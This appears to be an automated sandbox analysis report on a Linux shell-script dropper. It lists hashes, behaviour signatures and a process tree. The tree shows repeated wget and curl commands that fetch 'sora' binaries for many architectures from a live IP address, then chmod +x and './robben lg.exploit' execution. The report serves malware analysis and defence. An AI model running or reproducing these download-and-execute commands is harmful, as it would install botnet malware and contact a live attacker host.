Analysis

max time kernel: 4s
max time network: 129s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240508-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 18/10/2024, 02:26
Static task: static1

Behavioral task: behavioral1
    Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
    Resource: ubuntu1804-amd64-20240508-en

Behavioral task: behavioral2
    Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
    Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
    Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
    Resource: debian9-mipsbe-20240418-en

Behavioral task: behavioral4
    Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
    Resource: debian9-mipsel-20240611-en
General

Target: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Size: 2KB
MD5: 1d363d0224de71500a06aaf7e205d0bb
SHA1: 13fe03fe502546c5b53e156db53090275844d2ba
SHA256: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8
SHA512: 6030ceebdd5f6f16cbf10c1f30dfaf057d7f533dd156dc03c28c93920350407f5b3aebc4e09f2a74fdf2f155c7027001aed4d892ce0f83fb8b54b87a5212ddde
Malware Config

Signatures

File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.

    pid     Process
    1521    chmod
    1554    chmod
    1560    chmod
    1578    chmod
    1596    chmod
    1536    chmod
    1566    chmod
    1572    chmod
    1584    chmod
    1542    chmod
    1548    chmod
    1590    chmod
    1530    chmod
    1602    chmod

Executes dropped EXE (14 IoCs)

    ioc            pid     Process
    /tmp/robben    1522    robben
    /tmp/robben    1531    robben
    /tmp/robben    1537    robben
    /tmp/robben    1543    robben
    /tmp/robben    1549    robben
    /tmp/robben    1555    robben
    /tmp/robben    1561    robben
    /tmp/robben    1567    robben
    /tmp/robben    1573    robben
    /tmp/robben    1579    robben
    /tmp/robben    1585    robben
    /tmp/robben    1591    robben
    /tmp/robben    1597    robben
    /tmp/robben    1603    robben

System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.

    pid     Process
    1524    wget
    1528    curl
    1529    cat

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.

    description                     ioc            Process
    File opened for modification    /tmp/robben    a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Processes

/tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh  (PID 1517)
    command line: /tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
    - Writes file to tmp directory

    /usr/bin/wget  (PID 1518)
        command line: wget http://93.123.85.141/bins/sora.x86

    /usr/bin/curl  (PID 1519)
        command line: curl -O http://93.123.85.141/bins/sora.x86

    /bin/cat  (PID 1520)
        command line: cat sora.x86

    /bin/chmod  (PID 1521)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1522)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1524)
        command line: wget http://93.123.85.141/bins/sora.mips
        - System Network Configuration Discovery

    /usr/bin/curl  (PID 1528)
        command line: curl -O http://93.123.85.141/bins/sora.mips
        - System Network Configuration Discovery

    /bin/cat  (PID 1529)
        command line: cat sora.mips
        - System Network Configuration Discovery

    /bin/chmod  (PID 1530)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1531)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1533)
        command line: wget http://93.123.85.141/bins/sora.x86_64

    /usr/bin/curl  (PID 1534)
        command line: curl -O http://93.123.85.141/bins/sora.x86_64

    /bin/cat  (PID 1535)
        command line: cat sora.x86_64

    /bin/chmod  (PID 1536)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1537)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1539)
        command line: wget http://93.123.85.141/bins/sora.i468

    /usr/bin/curl  (PID 1540)
        command line: curl -O http://93.123.85.141/bins/sora.i468

    /bin/cat  (PID 1541)
        command line: cat sora.i468

    /bin/chmod  (PID 1542)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1543)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1545)
        command line: wget http://93.123.85.141/bins/sora.i686

    /usr/bin/curl  (PID 1546)
        command line: curl -O http://93.123.85.141/bins/sora.i686

    /bin/cat  (PID 1547)
        command line: cat sora.i686

    /bin/chmod  (PID 1548)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1549)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1551)
        command line: wget http://93.123.85.141/bins/sora.mpsl

    /usr/bin/curl  (PID 1552)
        command line: curl -O http://93.123.85.141/bins/sora.mpsl

    /bin/cat  (PID 1553)
        command line: cat sora.mpsl

    /bin/chmod  (PID 1554)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1555)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1557)
        command line: wget http://93.123.85.141/bins/sora.arm4

    /usr/bin/curl  (PID 1558)
        command line: curl -O http://93.123.85.141/bins/sora.arm4

    /bin/cat  (PID 1559)
        command line: cat sora.arm4

    /bin/chmod  (PID 1560)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1561)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1563)
        command line: wget http://93.123.85.141/bins/sora.arm5

    /usr/bin/curl  (PID 1564)
        command line: curl -O http://93.123.85.141/bins/sora.arm5

    /bin/cat  (PID 1565)
        command line: cat sora.arm5

    /bin/chmod  (PID 1566)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1567)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1569)
        command line: wget http://93.123.85.141/bins/sora.arm6

    /usr/bin/curl  (PID 1570)
        command line: curl -O http://93.123.85.141/bins/sora.arm6

    /bin/cat  (PID 1571)
        command line: cat sora.arm6

    /bin/chmod  (PID 1572)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1573)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1575)
        command line: wget http://93.123.85.141/bins/sora.arm7

    /usr/bin/curl  (PID 1576)
        command line: curl -O http://93.123.85.141/bins/sora.arm7

    /bin/cat  (PID 1577)
        command line: cat sora.arm7

    /bin/chmod  (PID 1578)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1579)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1581)
        command line: wget http://93.123.85.141/bins/sora.ppc

    /usr/bin/curl  (PID 1582)
        command line: curl -O http://93.123.85.141/bins/sora.ppc

    /bin/cat  (PID 1583)
        command line: cat sora.ppc

    /bin/chmod  (PID 1584)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1585)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1587)
        command line: wget http://93.123.85.141/bins/sora.ppc440fp

    /usr/bin/curl  (PID 1588)
        command line: curl -O http://93.123.85.141/bins/sora.ppc440fp

    /bin/cat  (PID 1589)
        command line: cat sora.ppc440fp

    /bin/chmod  (PID 1590)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1591)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1593)
        command line: wget http://93.123.85.141/bins/sora.m68k

    /usr/bin/curl  (PID 1594)
        command line: curl -O http://93.123.85.141/bins/sora.m68k

    /bin/cat  (PID 1595)
        command line: cat sora.m68k

    /bin/chmod  (PID 1596)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1597)
        command line: ./robben lg.exploit
        - Executes dropped EXE

    /usr/bin/wget  (PID 1599)
        command line: wget http://93.123.85.141/bins/sora.sh4

    /usr/bin/curl  (PID 1600)
        command line: curl -O http://93.123.85.141/bins/sora.sh4

    /bin/cat  (PID 1601)
        command line: cat sora.sh4

    /bin/chmod  (PID 1602)
        command line: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh config-err-qFPeaa netplan_tp4c7aih robben snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-73aRKD
        - File and Directory Permissions Modification

    /tmp/robben  (PID 1603)
        command line: ./robben lg.exploit
        - Executes dropped EXE